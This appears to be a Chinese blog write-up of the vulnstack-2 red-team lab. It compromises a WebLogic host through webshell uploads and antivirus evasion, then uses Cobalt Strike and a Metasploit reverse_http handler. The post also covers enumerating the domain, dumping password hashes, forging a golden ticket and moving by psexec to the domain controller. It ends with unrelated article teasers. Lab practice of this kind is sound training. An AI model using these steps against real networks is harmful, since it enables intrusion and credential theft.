vlunstack-2(复现红日安全-ATT CK实战)

环境搭建

配置信息

DC

IP:10.10.10.10

OS:Windows 2012(64)

应用:AD域

WEB

IP1:10.10.10.80

IP2:192.168.47.131

OS:Windows 2008(64)

应用:Weblogic 10.3.6MSSQL 2008

PC

IP1:10.10.10.201

IP2:192.168.47.130

OS:Windows 7(32)

攻击机

IP:192.168.47.128

WEB,PC 有360和防火墙

网络配置:

内网默认网段为10.10.10.1/24

DMZ默认网段为 192.168.111.1/24

管理员 Administrator / 1qaz@WSX

三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。

同时需要在web机开启weblogic服务

内网

首先添加一个vm2的内网自定义,设置子网为10.10.10.1/24

当虚拟机开启时,会采用已经设定过的ip地址(必须符合10.10.10开头

将DC,PC,WEB 设为 vm2 (内网环境)

外网

内网设置好了,外网这样设置

我设置的外网连接方式为NAT

将 攻击机,PC,WEB 外网设置为NAT,为了与kali在同一网段

PC与WEB做修改如下:

Dc:

Pc

Win

开启web服务

开启WEB的服务:管理员身份运行

C:\Oracle\Middleware\user_projects\domains\base_domain

信息收集

Nmap端口扫描

nmap -T4 -A -p 1-65535 192.168.163.137

由nmap扫描结果可知:

端口扫描

80,1433,3389,,7001,60966等

服务版本识别

IIS httpd 7.5,SQL Server 2008 R2 SP2,远程桌面服务,WebLogic Server

操作系统信息识别

Windows Server 2008 R2 - 2012

de1ay.com

工具检测发现漏洞

Dir查看路劲

查看进程

木马获取shell

weblogic上传木马路径选择:weblogic上传路径

方法1:把shell写到控制台images目录中:

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp              //目录上传木马

访问 http://192.168.163.137:7001/console/framework/skins/wlsconsole/images/shell.jsp

方法2:写到uddiexplorer目录中

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/uddiexplorer/shell.jsp

方法3:在应用安装目录中

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/项目名/shell.jsp

这里选择第一种

上传木马

被360查杀了

给冰蝎做免杀

GitHub - Tas9er/ByPassBehinder: ByPassBehinder / 冰蝎WebShell免杀生成 / Code By:Tas9er

生成木马

C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

查看生成成功了

但是太老了还是被查杀了

只能关闭360了不然免杀都不会做

冰蝎尝试一直失败

用哥斯拉

连接成了

cs生成监听器反弹到cs客户端

哥斯拉上传cs木马文件

Cs端收到回连

接着用ms-15权限提升

域内信息

1). 本机信息收集

1). 本机信息收集

shell Systeminfo  //查看操作系统信息

shell Ipconfig /all   //查询本机ip段,所在域等

shell Whoami   //查看当前用户权限

shell Net user //查看本地用户

shell Net localgroup administrators //查看本地管理员组(通常 包含域用户)

得知web服务器为Windows server 2008 有两个网段

2). 域内信息收集

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等

net view /domain              // 查看域

net time /domain           // 主域服务器会同时作为时间服务器

net user /domain      // 查看域用户

net group /domain     // 查看域内用户组列表

net group "domain computers" /domain      // 查看域内的机器

net group "domain controllers" /domain          // 查看域控制器组

net group "Enterprise Admins" /domain    // 查看域管理员组

域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC,域管理员为Administrator

接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机。

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_msfconsole的background挂起会话后怎么启动会话-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/weixin_54977781/article/details/131178720?ops_request_misc=%7B%22request%5Fid%22%3A%22172250449416800213084897%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=172250449416800213084897&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-131178720-null-null.142^v100^pc_search_result_base9&utm_term=cobalt strike4.7%E8%81%94%E5%8A%A8msf&spm=1018.2226.3001.4187

服务器安装msf

chmod 755 msfinstall.sh && ./msfinstall.sh

会话转移

(1)msfconsole                    // 打开 MSF 工具

(2)use exploit/multi/handler                                   // 设置 监听 模块.

(3)set payload windows/meterpreter/reverse_http                // 设置 payload

(4)set lport 4444                     // 设置一个端口(和上面的监听一样的端口)

(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址

(6)exploit                              // 进行测试

Cs生成外联监听器

权力委派上线成功

新建会话

Cs抓取密码凭证

权限维持

记录域名DE1AY.com的SID值

Authentication Id : 0 ; 158137 (00000000:000269b9)

Session           : Service from 0

User Name         : mssql

Domain            : DE1AY

Logon Server      : DC

Logon Time        : 2024/8/5 7:02:10

SID               : S-1-5-21-2756371121-2868759905-3853650604-2103

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 制作黄金票据

Administrator

DE1AY.com

S-1-5-21-2756371121-2868759905-3853650604-2103

31d6cfe0d16ae931b73c59d7e0c089c0

用于权限维持

横向渗透

smb渗透

端口扫描

目标列表查看

创建smb监听

右击会话—jump—psexec64(PC为32位,需要使用psexec)

10.10.10.10上线成功了

再次端口扫描发现

10.10.10.201

同样的方法上线成功了

思考总结:

免杀不会,外网打点信息收集不全,横向不熟练,渗透框架还不够结实

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/395106.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Chapter 30 多态

欢迎大家订阅【Python从入门到精通】专栏,一起探索Python的无限可能! 文章目录 前言一、基本概念二、抽象类 前言 多态(Polymorphism)是面向对象编程中的核心概念,本章将详细讲解 Python 中多态的实现方式以及如何应用…

科技驱动健康,景联文科技提供高质量高血压数据采集

当前,穿戴手表市场呈现出快速发展趋势,已成为可穿戴设备领域的一个重要组成部分。市场上智能手表的厂商包括小米、华为、苹果、步步高、vivo、努比亚、三六零、科大讯飞、等。 高血压数据采集可为高血压的预防提供支持,持续监测可以帮助用户及…

RabbitMQ高级特性 - 生产者消息确认机制

文章目录 生产者消息确认机制概述confirm 代码实现return 代码实现 生产者消息确认机制 概述 为了保证信息 从生产者 发送到 队列,因此引入了生产者的消息确认机制. RabbitMQ 提供了两种解决方案: 通过事务机制实现.通过发送确认机制(confi…

【第九节】python中xml解析和json编解码

目录 一、Python XML 解析 1.1 什么是XML 1.2 Python 对 XML 的解析方法 1.3 SAX解析xml 1.4 xml.dom解析xml 1.6 ElementTree解析XML 二、Python编解码json 2.1 什么是json 2.2 使用json 库 2.3 使用第三方库Demjson 一、Python XML 解析 1.1 什么是XML XML&#x…

Mouser中元件特性对比功能

搜索所需的元件,并点击比对 在比对界面里搜索所需比对的另外元器件,并比对3.得到的结果

从Vue到Postman全面验证API接口跨域问题

文章目录 1、前言2、跨域问题3、后端服务接口4、接口跨域测试4.1 Vue调用测试4.2 Postman测试 5、服务接口增加注解CrossOrigin解决跨域 1、前言 最近刚接手了一个新项目,业务还没了解全,让开发功能。做了俩接口,postman自测完能拿到数据就给…

影视解说中视频素材哪里找?

想做电影解说类视频,不知道哪里下载高清解说素材? 今天小编就带大家揭秘5大影视解说素材网站,赶紧进来看看吧!~ 1. 稻虎网 作为国内顶尖视频素材网站,稻虎素材网提供了丰富的电影解说视频素材,…

配置Mysql的慢查询日志

一、什么是Mysql慢查询日志 MySQL慢查询日志是MySQL数据库自带的一个功能,用于记录执行时间超过指定阈值的SQL语句,以便于后续的性能优化工作 帮助开发和DBA发现哪些SQL语句需要优化,在哪些地方需要修改,以提高数据库的性能 默认…

生成式AI,在中国工业找到新“活法”

生成式AI,正在经历一场关于落地前景的论战。 在德国中北部城市希尔德斯海姆,世界工业巨头博世已经把生成式AI技术用在了生产线上。他们以AI仿真绘制的方式合成出超过15000张关于产品缺陷的图片,然后将其应用于电机定子生产线的质检。借助生成…

MySQL中的索引——适合创建索引的情况

1.适合创建索引的情况 1、字段的数值有唯一性的限制 2、频繁作为 WHERE 查询条件的字段 某个字段在 SELECT 语句的 WHERE 条件中经常被使用到,那么就需要给这个字段创建索引了。尤其是在数据量大的情况下,创建普通索引就可以大幅提升数据查询的效率。 …

STM32基础篇:I2C通信协议

I2C总线 I2C(IIC---Inter Integrated Circuit 内部集成电路) 以上为I2C大体结构图,其中时钟线SCL用于传输时钟信号,数据线SDA来传输实际的数据。 主机与从机 1.主机的职责 假如由从机1和从机2,从机1想向SDA上发送一…

Java二十三种设计模式-桥接模式(10/23)

桥接模式:解耦抽象与实现的灵活设计 引言 桥接模式(Bridge Pattern)是一种结构型设计模式,用于将抽象部分与其实现部分分离,使它们可以独立地变化。它是一种对象结构型模式,又称为柄体(Handle and Body)模…

高翔【自动驾驶与机器人中的SLAM技术】学习笔记(五)卡尔曼滤波器一:认知卡尔曼滤波器;协方差矩阵与方差;

卡尔曼滤波器 为了研究卡尔曼,我阅读了大量博文。不敢说完全吃透,但是在做一件什么事,可以通过下面这文章来理解,我读了不下五遍。并整理标准重点,添加自己的一些见解。 自动驾驶传感器融合算法 - 自动驾驶汽车中的激…

电脑屏幕录制工具分享5款,附上详细电脑录屏教程(2024全新)

日月更迭,转眼间已经来到了2024年的立秋,在这个数字技术快速发展的时代,电脑录屏技术已经成为了一项不可或缺的技能,无论是用于工作汇报、在线教学、游戏直播还是个人娱乐。那么录屏软件哪个好用呢?接下来,…

Apache Tomcat 7下载、安装、环境变量配置 详细教程

Apache Tomcat 7下载、安装、环境变量配置 详细教程 Apache Tomcat 7下载Apache Tomcat 7 安装Apache Tomcat 7 环境变量配置启动 Apache Tomcat 7测试Tomcat7是否启动成功 Apache Tomcat 7下载 1、下载地址,找到Archives 链接: 官网下载地址 2、找到Tomcat 7&…

二进制分组背包优化

前言&#xff1a;好久没有写分组背包了&#xff0c;写一个二进制优化的背包练练手 #define _CRT_SECURE_NO_WARNINGS #include<bits/stdc.h> using namespace std;#define int long long int n,w; const int N (int)1e7; struct node{int value,weight; }sto[N]; int d…

【数据链路层】ARP协议

文章目录 以太网以太网帧对的格式 MAC地址对比MAC地址和IP地址 MTU和MSSARP协议ARP协议的工作原理ARP欺骗 以太网 ”以太网" 不是一种具体的网络, 而是一种技术标准; 既包含了数据链路层的内容, 也包含了一些物理层的内容. 例如: 规定了网络拓扑结构, 访问控制方式, 传输…

nuxt3实战:完整的 nuxt3 + vue3 项目创建与useFetch请求封装

一. 安装 pnpm dlx nuxilatest init <project-name>// ornpx nuxilatest init <project-name>如遇到报错 手动安装&#xff1a; 浏览器访问报错https请求地址&#xff1a; 点击tar(项目初始文件的下载地址)对应地址,下载starter-3.tar.gz 包到本地 本地创建项…

AskYourDatabase v1.1.83 使用人工智能连接您的数据库并与您的数据聊天

AskYourDatabase 是一个创新的 平台 它允许用户直接连接到您的数据库并与您的数据聊天 。这个革命性的工具使用人工智能来提供答案和分析&#xff0c;日常开发中可以用来帮助开发者编写sql脚本&#xff0c;分析数据结构等。支持市面上流行的数据库。后端数据库开发的又一利器&a…

Go语言加Vue3零基础入门全栈班15 gin+gorm+vue3用户管理系统实战录播课 2024年08月04日 课程笔记

预览 登录页面&#xff1a; 首页&#xff1a; 用户列表&#xff1a; 新增用户&#xff1a; 删除用户&#xff1a; 暗黑模式&#xff1a; 概述 如果您没有Golang的基础&#xff0c;应该学习如下前置课程。 01 Golang零基础入门课_20240726_149元02 Golang面向对象…